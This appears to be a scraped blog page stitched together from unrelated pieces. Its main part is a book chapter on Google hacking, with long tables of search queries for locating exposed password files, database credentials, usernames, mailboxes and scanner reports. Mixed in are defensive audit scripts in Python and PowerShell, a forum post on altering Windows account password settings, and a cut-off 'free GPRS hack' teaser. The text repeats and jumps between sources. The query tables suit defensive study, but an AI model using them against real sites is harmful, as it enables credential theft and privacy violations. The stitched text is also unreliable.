intitle:index.of dead.letter | UNIX unfinished e-mails
Summary
Make no mistake—there’s sensitive data on the Web, and Google can find it.
There’s hardly any limit to the scope of information that can be located, if only
you can figure out the right query. From usernames to passwords, credit card and
Social Security numbers, and personal financial information, it’s all out there. As a
purveyor of the “dark arts,” you can relish in the stupidity of others, but as a professional
tasked with securing a customer’s site from this dangerous form of
information leakage, you could be overwhelmed by the sheer scale of your
defensive duties.
As droll as it might sound, a solid, enforced security policy is a great way to
keep sensitive data from leaking to the Web. If users understand the risks associated
with information leakage and understand the penalties that come with violating
policy, they will be more willing to cooperate in what should be a security
partnership.
In the meantime, it certainly doesn’t hurt to understand the tactics an adversary
might employ in attacking a Web server. One thing that should become
clear as you read this book is that any attacker has an overwhelming number of
files to go after. One way to prevent dangerous Web information leakage is by
denying requests for unknown file types. Whether your Web server normally
serves up CFM,ASP, PHP, or HTML, it’s infinitely easier to manage what should
be served by the Web server instead of focusing on what should not be served.
Adjust your servers or your border protection devices to allow only specific content
or file types.
Solutions Fast Track
Searching for Usernames
_ Usernames can be found in a variety of locations.
_ In some cases, digging through documents or e-mail directories might
be required.
_ A simple query such as “your username is” can be very effective in
locating usernames.
Searching for Passwords
_ Passwords can also be found in a variety locations.
_ A query such as “Your password” forgot can locate pages that provide a
forgotten-password recovery mechanism.
_ intext:(password | passcode | pass) intext:(username | userid | user) is
another generic search for locating password information.
Searching for Credit Cards
Numbers, Social Security Numbers, and More
_ Documents containing credit card and Social Security number
information do exist and are relatively prolific.
_ Some irresponsible news outlets have revealed functional queries that
locate this information.
_ There are relatively few examples of personal financial data online, but
there is a great deal of variety.
_ In most cases, specific file extensions can be searched for.
Searching for Other Juicy Info
_ From address books and chat log files to network vulnerability reports,
there’s no shortage of sensitive data online.
This is not about finding sensitive data during an assessment as much as
it is about what the “bad guys” might do to troll for the data. The examples presented
generally represent the lowest-hanging fruit on the security
tree. Hackers target this information on a daily basis. To protect against this type
of attacker, we need to be fairly candid about the worst-case possibilities. We
won’t be overly candid, however.
We start by looking at some queries that can be used to uncover usernames,
the less important half of most authentication systems. The value of a username is
often overlooked, but an entire multimillion-dollar
security system can be shattered through skillful crafting of even the
smallest, most innocuous bit of information.
Next, we take a look at queries that are designed to uncover passwords. Some
of the queries we look at reveal encrypted or encoded passwords, which will take
a bit of work on the part of an attacker to use to his or her advantage. We also
take a look at queries that can uncover cleartext passwords. These queries are some
of the most dangerous in the hands of even the most novice attacker. What could
make an attack easier than handing a username and cleartext password to an
attacker?
We wrap up by discussing the very real possibility of uncovering
highly sensitive data such as credit card information and information used to
commit identity theft, such as Social Security numbers. Our goal here is to
explore ways of protecting against this very real threat. To that end, we don’t go
into details about uncovering financial information and the like. If you’re a “dark
side” hacker, you’ll need to figure these things out on your own.
Searching for Usernames
Most authentication mechanisms use a username and password to protect information.
To get through the “front door” of this type of protection, you’ll need to
determine usernames as well as passwords. Usernames also can be used for social
engineering efforts, as we discussed earlier.
Many methods can be used to determine usernames. In Chapter 10, we
explored ways of gathering usernames via database error messages. In Chapter 8
we explored Web server and application error messages that can reveal various
information, including usernames. These indirect methods of locating usernames
are helpful, but an attacker could target a usernames directory with a
query like “your username is”. This phrase can locate help pages that describe the
username creation process,
information gleaned from other sources, such as Google Groups posts or phone
listings. The usernames could then be recycled into various other phases of the
attack, such as a worm-based spam campaign or a social-engineering attempt. An
attacker can gather usernames from a variety of sources, as shown in the sample
queries listed
Sample Queries That Locate Usernames
inurl:admin inurl:userlist
    Generic userlist files
inurl:admin filetype:asp inurl:userlist
    Generic userlist files
inurl:php inurl:hlstats intext:Server Username
    Half-life statistics file, lists username and other information
filetype:ctl inurl:haccess.ctl Basic
    Microsoft FrontPage equivalent of htaccess, shows Web user credentials
filetype:reg reg intext:"internet account manager"
    Microsoft Internet Account Manager can reveal usernames and more
filetype:wab wab
    Microsoft Outlook Express Mail address books
filetype:mdb inurl:profiles
    Microsoft Access databases containing (user) profiles
index.of perform.ini
    mIRC IRC ini file can list IRC usernames and other information
inurl:root.asp?acs=anon
    Outlook Mail Web Access directory can be used to discover usernames
filetype:conf inurl:proftpd.conf -sample
    PROFTP FTP server configuration file reveals username and server information
filetype:log username putty
    PUTTY SSH client logs can reveal usernames and server information
filetype:rdp rdp
    Remote Desktop Connection files reveal user credentials
intitle:index.of .bash_history
    UNIX bash shell history reveals commands typed at a bash command prompt; usernames are often typed as argument strings
intitle:index.of .sh_history
    UNIX shell history reveals commands typed at a shell command prompt; usernames are often typed as argument strings
"index of " lck
    Various lock files list the user currently using a file
+intext:webalizer +intext:Total Usernames +intext:"Usage Statistics for"
    Webalizer Web statistics page lists Web usernames and statistical information
filetype:reg reg HKEY_CURRENT_USER username
    Windows Registry exports can reveal usernames and other information
Underground Googling
Searching for a Known Filename
Remember that there are several ways to search for a known filename.
One way relies on locating the file in a directory listing, like intitle:index.of
install.log. Another, often better, method relies on the filetype operator,
as in filetype:log inurl:install.log. Directory listings are not all that
common. Google will crawl a link to a file in a directory listing, meaning
that the filetype method will find both directory listing entries as well as
files crawled in other ways.
In some cases, usernames can be gathered from Web-based statistical programs
that check Web activity. The Webalizer program shows all sorts of information
about a Web server’s usage. Output files for the Webalizer program can be
located with a query such as intext:webalizer intext:"Total Usernames" intext:"Usage
Statistics for". Among the information displayed is the username that was used to
connect to the Web server, as shown in Figure 9.2. In some cases, however, the
usernames displayed are not valid or current, but the “Visits” column lists the
number of times a user account was used during the capture period. This enables
an attacker to easily determine which accounts are more likely to be valid.
The Windows registry holds all sorts of authentication information, including
usernames and passwords. Though it is unlikely (and fairly uncommon) to locate
live, exported Windows registry files on the Web, at the time of this writing
there are nearly 100 hits on the query filetype:reg HKEY_CURRENT_USER
username, which locates Windows registry files that contain the word username
and in some cases passwords,
As any talented attacker or security person will tell you, it’s rare to get information
served to you on a silver platter. Most decent finds take a bit of persistence,
creativity, intelligence, and just a bit of good luck. For example, consider
the Microsoft Outlook Web Access portal, which can be located with a query
like inurl:root.asp?acs=anon. At the time of this writing, fewer than 50 sites are
returned by this query, even though there are certainly more than 50 sites running
the Microsoft Web-based mail portal. Regardless of how you might locate a site
running this e-mail gateway, it’s not uncommon for the site to host a public
directory (denoted “Find Names,” by default)
The public directory allows access to a search page that can be used to find
users by name. In most cases, wildcard searching is not allowed, meaning that a
search for * will not return a list of all users, as might be expected. Entering a
search for a space is an interesting idea, since most user descriptions contain a
space, but most large directories will return the error message “This query would
return too many addresses!” Applying a bit of creativity, an attacker could begin
searching for individual common letters, such as the “Wheel of Fortune letters”
R, S, T, L, N, and E. Eventually one of these searches will most likely reveal a list
of user information like
Once a list of user information is returned, the attacker can then recycle the
search with words contained in the user list, searching for the words Voyager,
Freshmen, or Campus, for example. Those results can then be recycled, eventually
resulting in a nearly complete list of user information.
Searching for Passwords
Password data, one of the “Holy Grails” during a penetration test, should be protected.
Unfortunately, many examples of Google queries can be used to locate
passwords on the Web, as shown in Table 9.2.
Table 9.2 Queries That Locate Password Information
inurl:/db/main.mdb
    ASP-Nuke passwords
filetype:cfm "cfapplication name" password
    ColdFusion source with potential passwords
filetype:pass pass intext:userid
    dbman credentials
allinurl:auth_user_file.txt
    DCForum user passwords
eggdrop filetype:user user
    Eggdrop IRC user credentials
filetype:ini inurl:flashFXP.ini
    FlashFXP FTP credentials
filetype:url +inurl:"ftp://" +inurl:"@"
    FTP bookmarks cleartext passwords
inurl:zebra.conf intext:password -sample -test -tutorial -download
    GNU Zebra passwords
filetype:htpasswd htpasswd
    HTTP htpasswd Web user credentials
intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c
    HTTP htpasswd Web user credentials
intitle:"Index of" ".htpasswd" htpasswd.bak
    HTTP htpasswd Web user credentials
"http://*:*@www" bob:bob
    HTTP passwords (bob is a sample username)
"sets mode: +k"
    IRC channel keys (passwords)
"Your password is * Remember this for later use"
    IRC NickServ registration passwords
signin filetype:url
    JavaScript authentication credentials
LeapFTP intitle:"index.of./" sites.ini modified
    LeapFTP client login credentials
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
    LILO passwords
filetype:config config intext:appSettings "User ID"
    Microsoft .NET application credentials
filetype:pwd service
    Microsoft FrontPage Service Web passwords
intitle:index.of administrators.pwd
    Microsoft FrontPage Web credentials
"# -FrontPage-" inurl:service.pwd
    Microsoft FrontPage Web passwords
ext:pwd inurl:_vti_pvt inurl:(Service | authors | administrators)
    Microsoft FrontPage Web passwords
inurl:perform filetype:ini
    mIRC nickserv credentials
intitle:"index of" intext:connect.inc
    mySQL database credentials
intitle:"index of" intext:globals.inc
    mySQL database credentials
filetype:conf oekakibbs
    Oekakibss user passwords
filetype:dat wand.dat
    Opera "Magic Wand" Web credentials
inurl:ospfd.conf intext:password -sample -test -tutorial -download
    OSPF Daemon passwords
index.of passlist
    Passlist user credentials
inurl:passlist.txt
    passlist.txt file user credentials
filetype:dat "password.dat"
    password.dat files
inurl:password.log filetype:log
    password.log file reveals usernames, passwords, and hostnames
filetype:log inurl:"password.log"
    password.log files cleartext passwords
inurl:people.lst filetype:lst
    People.lst generic password file
intitle:index.of config.php
    PHP configuration file database credentials
inurl:config.php dbuname dbpass
    PHP configuration file database credentials
inurl:nuke filetype:sql
    PHP-Nuke credentials
filetype:conf inurl:psybnc.conf "USER.PASS="
    psyBNC IRC user credentials
filetype:ini ServUDaemon
    servU FTP Daemon credentials
filetype:conf slapd.conf
    slapd configuration files root password
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
    slapd LDAP credentials
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
    slapd LDAP root password
filetype:sql "IDENTIFIED BY" -cvs
    SQL passwords
filetype:sql password
    SQL passwords
filetype:ini wcx_ftp
    Total Commander FTP passwords
filetype:netrc password
    UNIX .netrc user credentials
index.of.etc
    UNIX /etc directories contain various credential files
intitle:"Index of..etc" passwd
    UNIX /etc/passwd user credentials
intitle:index.of passwd passwd.bak
    UNIX /etc/passwd user credentials
intitle:"Index of" pwd.db
    UNIX /etc/pwd.db credentials
intitle:Index.of etc shadow
    UNIX /etc/shadow user credentials
intitle:index.of master.passwd
    UNIX master.passwd user credentials
intitle:"Index of" spwd.db passwd -pam.conf
    UNIX spwd.db credentials
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
    UNIX various password file backups
filetype:inc dbconn
    Various database credentials
filetype:inc intext:mysql_connect
    Various database credentials, server names
filetype:properties inurl:db intext:password
    Various database credentials, server names
inurl:vtund.conf intext:pass -cvs
    Virtual Tunnel Daemon passwords
inurl:"wvdial.conf" intext:
    wvdial dialup user credentials
filetype:mdb wwforum
    Web Wiz Forums Web credentials
"AutoCreate=TRUE password=*"
    Website Access Analyzer user passwords
filetype:pwl pwl
    Windows Password List user credentials
filetype:reg reg +intext:"defaultusername" intext:"defaultpassword"
    Windows Registry keys containing user credentials
filetype:reg reg +intext:"internet account manager"
    Windows Registry keys containing user credentials
"index of/" "ws_ftp.ini" "parent directory"
    WS_FTP FTP credentials
filetype:ini ws_ftp pwd
    WS_FTP FTP user credentials
inurl:/wwwboard
    wwwboard user credentials
In most cases, passwords discovered on the Web are either encrypted or
encoded in some way. In most cases, these passwords can be fed into a password
cracker such as John the Ripper from www.openwall.com/john to produce
plaintext passwords that can be used in an attack. Figure 9.6 shows the results of
the search ext:pwd inurl:_vti_pvt inurl:(Service | authors | administrators), which
combines a search for some common
Exported Windows registry files often contain encrypted or encoded passwords
as well. If a user exports the Windows registry to a file and Google subsequently
crawls that file, a query like filetype:reg intext:"internet account manager"
could reveal interesting keys containing password data
ress. Note that live, exported Windows registry files are not very common, but it’s
not uncommon for an attacker to target a site simply because of one exceptionally
insecure file. It’s also possible for a Google query to uncover cleartext passwords.
These passwords can be used as is without having to employ a
password-cracking utility. In these extreme cases, the only challenge is determining
the username as well as the host on which the password can be used. As
shown in Figure 9.8, certain queries will locate all the following information:
usernames, cleartext passwords, and the host that uses that authentication!
There is no magic query for locating passwords, but during an assessment,
remember that the simplest queries directed at a site can have amazing results, as
we discussed in Chapter 7, Ten Simple Searches. For example, a query like “Your
password” forgot would locate pages that provide a forgotten-password recovery
mechanism. The information from this type of query can be used to formulate
any of a number of attacks against a password. As always, effective social engineering
is a terrific nontechnical solution to “forgotten” passwords.
Another generic search for password information, intext:(password | passcode |
pass) intext:(username | userid | user), combines common words for passwords and
user IDs into one query. This query returns a lot of results, but the vast majority
of the top hits refer to pages that list forgotten-password information, including
either links or contact information. Using Google’s translate feature, found at
http://translate.google.com/translate_t, we could also create multilingual password
searches. Table 9.3 lists common translations for the word password.
English Translations of the Word Password
Language Word Translation
German password Kennwort
Spanish password contraseña
French password mot de passe
Italian password parola d’accesso
Portuguese password senha
Dutch password Paswoord
NOTE
The terms username and userid in most languages translate to username
and userid, respectively.
Searching for Credit Card Numbers,
Social Security Numbers, and More
Most people have heard news stories about Web hackers making off with customer
credit card information. With so many fly-by-night retailers popping up
on the Internet, it’s no wonder that credit card fraud is so prolific. These mom-and-pop
retailers are not the only ones successfully compromised by hackers.
Corporate giants by the hundreds have had financial database compromises over
the years, victims of sometimes very technical, highly focused attackers. What
might surprise you is that it doesn’t take a rocket scientist to uncover live credit
card numbers on the Internet, thanks to search engines like Google. Everything
from credit information to banking data or supersensitive classified government
documents can be found on the Web. Consider the (highly edited) Web page
This document, found using Google, lists hundreds and hundreds of credit
card numbers (including expiration date and card validation numbers) as well as
the owners’ names, addresses, and phone numbers. This particular document also
included phone card (calling card) numbers. Notice the scroll bar on the right-hand
side of Figure 9.9, an indicator that the displayed page is only a small part
of this huge document—like many other documents of its kind. In most cases,
pages that contain these numbers are not “leaked” from online retailers or e-commerce
sites but rather are most likely the fruits of a scam known as phishing,
in which users are solicited via telephone or e-mail for personal information.
Several Web sites, including MillerSmiles.co.uk, document these scams and
hoaxes. Figure 9.10 shows a screen shot of a popular eBay phishing scam that
encourages users to update their eBay profile information.
Once a user fills out this form, all the information is sent via e-mail to the
attacker, who can use it for just about anything.
Tools and Traps
Catching Online Scammers
In some cases, you might be able to use Google to help nab the bad guys.
Phishing scams are effective because the fake page looks like an official
page. To create an official-looking page, the bad guys must have examples
to work from, meaning that they must have visited a few legitimate companies’
Web sites. If the phishing scam was created using text from several
companies’ existing pages, you can key in on specific phrases from the fake
page, creating Google queries designed to round up the servers that hosted
some of the original content. Once you’ve located the servers that contained
the pilfered text, you can work with the companies involved to
extract correlating connection data from their log files. If the scammer visited
each company’s Web page, collecting bits of realistic text, his IP should
appear in each of the log files. Auditors at SensePost (www.sensepost.com)
have successfully used this technique to nab online scam artists.
Unfortunately, if the scammer uses an exact copy of a page from only one
company, this task becomes much more difficult to accomplish.
Social Security Numbers
Social Security numbers (SSNs) and other sensitive data can be easily located
with Google as well as via the same techniques used to locate credit card numbers.
For a variety of reasons, SSNs might appear online—for example, educational
facilities are notorious for using an SSN as a student ID, then posting
grades to a public Web site with the “student ID” displayed next to the grade. A
creative attacker can do quite a bit with just an SSN, but in many cases it helps
to also have a name associated with that SSN. Again, educational facilities have
been found exposing this information via Excel spreadsheets listing students’
names, grades, and SSNs, despite the fact that the student ID number is often
used to help protect the privacy of the student! Although we don’t feel it’s right
to go into the details of how this data is located, several media outlets have irresponsibly
posted the details online. Although the blame lies with the sites that are
leaking this information, in our opinion it’s still not right to draw attention to
how exactly the information can be located.
Personal Financial Data
In some cases, phishing scams are responsible for publicizing personal information;
in other cases, hackers attacking online retailers are to blame for this breach of
privacy. Sadly, there are many instances where an individual is personally responsible
for his own lack of privacy. Such is the case with personal financial information.
With the explosion of personal computers in today’s society, users have
literally hundreds of personal finance programs to choose from. Many of these
programs create data files with specific file extensions that can be searched with
Google. It’s hard to imagine why anyone would post personal financial information
to a public Web site (which subsequently gets crawled by Google), but it
must happen quite a bit, judging by the number of hits for program files generated
by Quicken and Microsoft Money, for example. Although it would be
somewhat irresponsible to provide queries here that would unearth personal
financial data, it’s important to understand the types of data that could potentially
be uncovered by an attacker. To that end, Table 9.4 shows file extensions for various
financial, accounting, and tax return programs. Ensure that these file types
aren’t listed on a Web server you’re charged with protecting.
File Extension Description
afm Abassis Finance Manager
ab4 Accounting and Business File
mmw AceMoney File
Iqd AmeriCalc Mutual Fund Tax Report
et2 Electronic Tax Return Security File (Australia)
tax Intuit TurboTax Tax Return
t98-t04 Kiplinger Tax Cut File (extension based on two-digit return year)
mny Microsoft Money 2004 Money Data Files
mbf Microsoft Money Backup Files
inv MSN Money Investor File
ptdb Peachtree Accounting Database
qbb QuickBooks Backup Files reveal financial data
qdf Quicken personal finance data
soa Sage MAS 90 accounting software
sdb Simply Accounting
stx Simply Tax Form
tmd Time and Expense Tracking
tls Timeless Time & Expense
fec U.S. Federal Campaign Expense Submission
wow Wings Accounting File
Searching for Other Juicy Info
As we’ve seen, Google can be used to locate all sorts of sensitive information. In
this section we take a look at some of the data that Google can find that’s harder
to categorize. From address books to chat log files and network vulnerability
reports, there’s no shortage of sensitive data online. Table 9.5 shows some queries
that can be used to uncover various types of sensitive data.
intext:"Session Start * * * *:*:* *" filetype:log
    AIM and IRC log files
filetype:blt blt +intext:screenname
    AIM buddy lists
buddylist.blt
    AIM buddy lists
intitle:index.of cgiirc.config
    CGIIRC (Web-based IRC client) config file, shows IRC servers and user credentials
inurl:cgiirc.config
    CGIIRC (Web-based IRC client) config file, shows IRC servers and user credentials
"Index of" / "chat/logs"
    Chat logs
intitle:"Index Of" cookies.txt "size"
    cookies.txt file reveals user information
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
    Curriculum vitae (resumes) reveal names and address information
ext:ini intext:env.ini
    Generic environment data
intitle:index.of inbox
    Generic mailbox files
"Running in Child mode"
    Gnutella client data and statistics
":8080" ":3128" ":80" filetype:txt
    HTTP proxy lists
intitle:"Index of" dbconvert.exe chats
    ICQ chat logs
"sets mode: +p"
    IRC private channel information
"sets mode: +s"
    IRC secret channel information
"Host Vulnerability Summary Report"
    ISS vulnerability scanner reports, reveal potential vulnerabilities on hosts and networks
"Network Vulnerability Assessment Report"
    ISS vulnerability scanner reports, reveal potential vulnerabilities on hosts and networks
filetype:pot inurl:john.pot
    John the Ripper password cracker results
intitle:"Index Of" -inurl:maillog maillog size
    Maillog files reveal e-mail traffic information
ext:mdb inurl:*.mdb inurl:
    Microsoft FrontPage database folders
filetype:xls inurl:contact
    Microsoft Excel sheets containing contact information
intitle:index.of haccess.ctl
    Microsoft FrontPage equivalent(?) of htaccess, shows Web authentication info
ext:log "Software: Microsoft Internet Information Services *.*"
    Microsoft Internet Information Services (IIS) log files
filetype:pst inurl:"outlook.pst"
    Microsoft Outlook e-mail and calendar backup files
intitle:index.of mt-db-pass.cgi
    Movable Type default file
filetype:ctt ctt messenger
    MSN Messenger contact lists
"This file was generated by Nessus"
    Nessus vulnerability scanner reports, reveal potential vulnerabilities on hosts and networks
inurl:"newsletter/admin/"
    Newsletter administration information
inurl:"newsletter/admin/" intitle:"newsletter admin"
    Newsletter administration information
filetype:eml eml intext:"Subject" +From
    Outlook Express e-mail files
intitle:index.of inbox dbx
    Outlook Express mailbox files
filetype:mbx mbx intext:Subject
    Outlook v1-v4 or Eudora mailbox files
inurl:/public/?Cmd=contents
    Outlook Web Access public folders or appointments
filetype:pdb pdb backup (Pilot | Pluckerdb)
    Palm Pilot Hotsync database files
"This is a Shareaza Node"
    Shareaza client data and statistics
inurl:/_layouts/settings
    Sharepoint configuration information
inurl:ssl.conf filetype:conf
    SSL configuration files, reveal various configuration information
site:edu admin grades
    Student grades
intitle:index.of mystuff.xml
    Trillian user Web links
inurl:forward filetype:forward -cvs
    UNIX mail forward files reveal e-mail addresses
intitle:index.of dead.letter
    UNIX unfinished e-mails
Summary
Make no mistake—there’s sensitive data on the Web, and Google can find it.
There’s hardly any limit to the scope of information that can be located, if only
you can figure out the right query. From usernames to passwords, credit card and
Social Security numbers, and personal financial information, it’s all out there. As a
purveyor of the “dark arts,” you can relish in the stupidity of others, but as a professional
tasked with securing a customer’s site from this dangerous form of
information leakage, you could be overwhelmed by the sheer scale of your
defensive duties.
As droll as it might sound, a solid, enforced security policy is a great way to
keep sensitive data from leaking to the Web. If users understand the risks associated
with information leakage and understand the penalties that come with violating
policy, they will be more willing to cooperate in what should be a security
partnership.
In the meantime, it certainly doesn’t hurt to understand the tactics an adversary
might employ in attacking a Web server. One thing that should become
clear as you read this book is that any attacker has an overwhelming number of
files to go after. One way to prevent dangerous Web information leakage is by
denying requests for unknown file types. Whether your Web server normally
serves up CFM, ASP, PHP, or HTML, it’s infinitely easier to manage what should
be served by the Web server instead of focusing on what should not be served.
Adjust your servers or your border protection devices to allow only specific content
or file types.
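The allowlist idea above, turned into a check a defender can run against a document root before a crawler gets to it. This is an added example, not code from the book: it reports every file whose extension is outside the set the server is meant to serve, and separately flags the file names and extensions singled out in the username, password, financial and "other juicy info" tables of this chapter. The served-extension allowlist, the pattern lists and the sample tree are all assumptions constructed here.

```python
"""Audit a Web document root for files that the Google queries in this chapter
would expose. Added example: the allowlist, the pattern lists and the sample
document root below are constructed assumptions, not the book's own material."""
import re
import tempfile
from pathlib import Path

# Extensions this server is meant to serve (the Summary's allowlist approach):
# everything NOT in this set is reported, not just the "known bad" types.
SERVED_EXTENSIONS = {".html", ".htm", ".php", ".asp", ".cfm", ".css", ".js",
                     ".png", ".jpg", ".gif"}

# Extensions from Table 9.4 (finance/tax programs) plus file types targeted by
# the username, password and "other juicy info" tables.
SENSITIVE_EXTENSIONS = {
    ".afm", ".ab4", ".mmw", ".et2", ".tax", ".mny", ".mbf", ".inv", ".ptdb",
    ".qbb", ".qdf", ".soa", ".sdb", ".stx", ".tmd", ".tls", ".fec", ".wow",
    ".pwd", ".pwl", ".reg", ".rdp", ".wab", ".mdb", ".pst", ".dbx", ".mbx",
    ".pdb", ".eml", ".netrc", ".htpasswd", ".pot", ".blt", ".ctt", ".bak",
    ".inc", ".log", ".ini", ".conf", ".sql"}

# File names the tables call out by name (matched case-insensitively).
SENSITIVE_NAMES = re.compile(
    r"^(\.?htpasswd|\.?htaccess|\.bash_history|\.sh_history|\.?netrc|passwd|shadow|"
    r"master\.passwd|pwd\.db|spwd\.db|ws_ftp\.ini|wcx_ftp\.ini|sites\.ini|"
    r"perform\.ini|flashfxp\.ini|service\.pwd|administrators\.pwd|authors\.pwd|"
    r"config\.php|connect\.inc|globals\.inc|john\.pot|cookies\.txt|dead\.letter|"
    r"auth_user_file\.txt|passlist(\.txt)?|password\.(dat|log)|people\.lst|"
    r"slapd\.conf|lilo\.conf|zebra\.conf|ospfd\.conf|vtund\.conf|psybnc\.conf|"
    r"wvdial\.conf|ssl\.conf|proftpd\.conf|cgiirc\.config|mt-db-pass\.cgi|"
    r"mystuff\.xml|buddylist\.blt|wand\.dat|env\.ini|maillog|inbox|outlook\.pst)$",
    re.IGNORECASE)


def audit_webroot(root):
    """Walk `root` and return (unexpected, sensitive), both lists of paths
    relative to root: files outside the served-extension allowlist, and files
    whose name or extension matches the chapter's sensitive patterns."""
    root = Path(root)
    unexpected, sensitive = [], []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        ext = path.suffix.lower()          # "" for dotfiles such as .htpasswd
        if ext not in SERVED_EXTENSIONS:
            unexpected.append(rel)
        # A backup of a sensitive file (passwd.bak, htpasswd.bak) is still that file.
        stem = path.name[:-4] if ext == ".bak" else path.name
        if SENSITIVE_NAMES.match(stem) or ext in SENSITIVE_EXTENSIONS:
            sensitive.append(rel)
    return unexpected, sensitive


def build_sample_webroot():
    """Constructed sample document root: legitimate content mixed with the kinds
    of files the chapter's queries find. Contents are placeholders, not real data."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    files = {
        "index.html": "<html>hello</html>",
        "css/site.css": "body {}",
        "app/login.php": "<?php ?>",
        "_vti_pvt/service.pwd": "# -FrontPage-\nadmin:placeholder",
        "backup/passwd.bak": "root:x:0:0::/root:/bin/sh",
        "files/ws_ftp.ini": "[host]\nPWD=placeholder",
        "finance/2004.qdf": "",
        "logs/u_ex0401.log": "#Software: Microsoft Internet Information Services 6.0",
        "docs/readme.txt": "nothing sensitive here",
    }
    for rel, body in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return root


if __name__ == "__main__":
    sample_root = build_sample_webroot()
    unexpected, sensitive = audit_webroot(sample_root)
    print(f"Files under {sample_root} outside the served-extension allowlist:")
    for rel in unexpected:
        print(f"  {rel}{'  <- matches a sensitive pattern' if rel in sensitive else ''}")
```

The audit only covers files; directory listings (the intitle:index.of queries above) are a server setting to turn off separately.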
Solutions Fast Track
Searching for Usernames
_ Usernames can be found in a variety of locations.
_ In some cases, digging through documents or e-mail directories might
be required.
_ A simple query such as “your username is” can be very effective in
locating usernames.
Searching for Passwords
_ Passwords can also be found in a variety of locations.
_ A query such as “Your password” forgot can locate pages that provide a
forgotten-password recovery mechanism.
_ intext:(password | passcode | pass) intext:(username | userid | user) is
another generic search for locating password information.
Searching for Credit Cards
Numbers, Social Security Numbers, and More
_ Documents containing credit card and Social Security number
information do exist and are relatively prolific.
_ Some irresponsible news outlets have revealed functional queries that
locate this information.
_ There are relatively few examples of personal financial data online, but
there is a great deal of variety.
_ In most cases, specific file extensions can be searched for.
Searching for Other Juicy Info
_ From address books and chat log files to network vulnerability reports,
there’s no shortage of sensitive data online.
Windows Password Loophole
I wish I'd quit finding these !! : Sai Teja
a. ok now, what you need to do is to run compmgmt.msc
b. and click on local users and groups.
c. once you've gotten here you need to open up the 'users' folder.
at this point i am walking along with you and notice that there are several
major security holes dealing specifically with the password:
1. double clicking on the any user name allows you a list that looks
something like this:
"user name"
full name: -----------------------
|__________________|
description: -----------------------
|__________________|
--
|_| user must change password at next logon
--
|_| user cannot change password
--
|/| password never expires
--
|_| account is disabled
--
|_| account is locked out
"ok" "cancel" "apply"
ok if you can get past my cheesy drawing, i must ask, did you notice that
the "password never expires" box is checked? if you did, then you may have
realized that this means that you can also uncheck it!
2. if you're paying attention, you'll see that the 'user must change password
at next logon' box is unchecked. if you put a check in this box of course,
when you shut down the system will prompt for a new password!
3. going back to step c.,
right click on any account and notice the dialog that appears:
set password...
all tasks
delete
rename
properties
help
i think you can handle it from here
ps. i wonder if you can access this data if this stuff is locked to the user
by the admin by going in through the command prompt. i doubt it but if anyone
finds a way let me know.
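As an added defensive check (not part of the post above): this PowerShell script reads the same per-account flags the compmgmt.msc dialog shows, for every local account at once, through the WinNT ADSI provider, and lists who is in the local Administrators group, since only those members can actually flip the boxes or set another user's password. The bit values are the documented ADS_USER_FLAG_ENUM constants; the function names are my own.

```powershell
# Added example (not part of the original post): read the same per-account
# flags the compmgmt.msc user dialog shows, for every local account at once,
# and list who can actually change them (members of local Administrators).
# Uses the WinNT ADSI provider, so it needs no extra module. Run it from an
# elevated prompt to see every account.

# Bit values of the UserFlags attribute (documented ADS_USER_FLAG_ENUM).
$ADS_UF_ACCOUNTDISABLE     = 0x00002   # "account is disabled"
$ADS_UF_LOCKOUT            = 0x00010   # "account is locked out"
$ADS_UF_PASSWD_CANT_CHANGE = 0x00040   # "user cannot change password"
$ADS_UF_DONT_EXPIRE_PASSWD = 0x10000   # "password never expires"

function Get-LocalAccountFlagReport {
    # Hypothetical helper name. Returns one object per local user account.
    param([string]$ComputerName = $env:COMPUTERNAME)

    $computer = [ADSI]"WinNT://$ComputerName,computer"
    foreach ($entry in $computer.Children) {
        if ($entry.SchemaClassName -ne 'user') { continue }

        $flags = [int]$entry.UserFlags.Value
        # PasswordExpired = 1 is the "user must change password at next logon" box.
        $mustChange = ([int]$entry.PasswordExpired.Value -eq 1)
        # PasswordAge is reported in seconds.
        $ageDays = [math]::Round(([int]$entry.PasswordAge.Value) / 86400, 1)

        [pscustomobject]@{
            Name                     = [string]$entry.Name
            Disabled                 = [bool]($flags -band $ADS_UF_ACCOUNTDISABLE)
            LockedOut                = [bool]($flags -band $ADS_UF_LOCKOUT)
            PasswordNeverExpires     = [bool]($flags -band $ADS_UF_DONT_EXPIRE_PASSWD)
            UserCannotChangePassword = [bool]($flags -band $ADS_UF_PASSWD_CANT_CHANGE)
            MustChangeAtNextLogon    = $mustChange
            PasswordAgeDays          = $ageDays
        }
    }
}

function Find-RiskyLocalAccounts {
    # Hypothetical helper name. Enabled accounts whose password policy has been
    # weakened through the very checkboxes the post describes.
    param([string]$ComputerName = $env:COMPUTERNAME)

    Get-LocalAccountFlagReport -ComputerName $ComputerName | Where-Object {
        -not $_.Disabled -and
        ($_.PasswordNeverExpires -or $_.UserCannotChangePassword)
    }
}

function Get-LocalAdministratorMembers {
    # Hypothetical helper name. Only these principals can change the boxes
    # above (or set another user's password) from compmgmt.msc.
    # Note: the group name is localized on non-English Windows.
    param([string]$ComputerName = $env:COMPUTERNAME)

    $group = [ADSI]"WinNT://$ComputerName/Administrators,group"
    foreach ($member in $group.psbase.Invoke('Members')) {
        # Members come back as raw COM objects; read ADsPath via late binding.
        $member.GetType().InvokeMember('ADsPath', 'GetProperty', $null, $member, $null)
    }
}

# Usage
Get-LocalAccountFlagReport | Format-Table -AutoSize
Write-Host "Enabled accounts with weakened password settings:"
Find-RiskyLocalAccounts | Format-Table Name, PasswordNeverExpires, UserCannotChangePassword -AutoSize
Write-Host "Who can change these settings (local Administrators):"
Get-LocalAdministratorMembers
```

Any non-admin principal showing up in the last list, or an enabled account with "password never expires" that nobody remembers setting, is what to chase first.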
Saturday, November 1, 2008
Idea Hack for free GPRS
This is the new trick for the user of idea cellular.
cell phone or pc/laptop.....
Before starting the detailed procedure these things described as
#1... YOU MUST NOT HAVE CONNECTION !
